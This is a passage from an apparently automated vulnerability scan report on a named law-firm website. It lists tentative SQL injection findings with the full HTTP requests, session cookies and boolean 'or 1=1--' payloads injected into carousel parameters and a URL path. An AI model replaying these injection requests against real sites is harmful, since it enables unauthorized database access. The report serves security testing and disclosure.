<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no15534429'%20or%201%3d2--%20&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.47. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_directory parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The slide_directory parameter appears to be vulnerable to SQL injection attacks. The payloads 12403700'%20or%201%3d1--%20 and 12403700'%20or%201%3d2--%20 were each submitted in the slide_directory parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides12403700'%20or%201%3d1--%20&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides12403700'%20or%201%3d2--%20&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.48. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_links parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The slide_links parameter appears to be vulnerable to SQL injection attacks. The payloads 79799331'%20or%201%3d1--%20 and 79799331'%20or%201%3d2--%20 were each submitted in the slide_links parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no79799331'%20or%201%3d1--%20&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no79799331'%20or%201%3d2--%20&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.49. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_number_display parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The slide_number_display parameter appears to be vulnerable to SQL injection attacks. The payloads 16437454'%20or%201%3d1--%20 and 16437454'%20or%201%3d2--%20 were each submitted in the slide_number_display parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no16437454'%20or%201%3d1--%20&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no16437454'%20or%201%3d2--%20&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.50. http://www.curtis.com/scripts/carousel/getimages.cfm [water_mark parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The water_mark parameter appears to be vulnerable to SQL injection attacks. The payloads 19764299'%20or%201%3d1--%20 and 19764299'%20or%201%3d2--%20 were each submitted in the water_mark parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no19764299'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no19764299'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.51. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/adobegaramond.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15403378'%20or%201%3d1--%20 and 15403378'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr315403378'%20or%201%3d1--%20/adobegaramond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
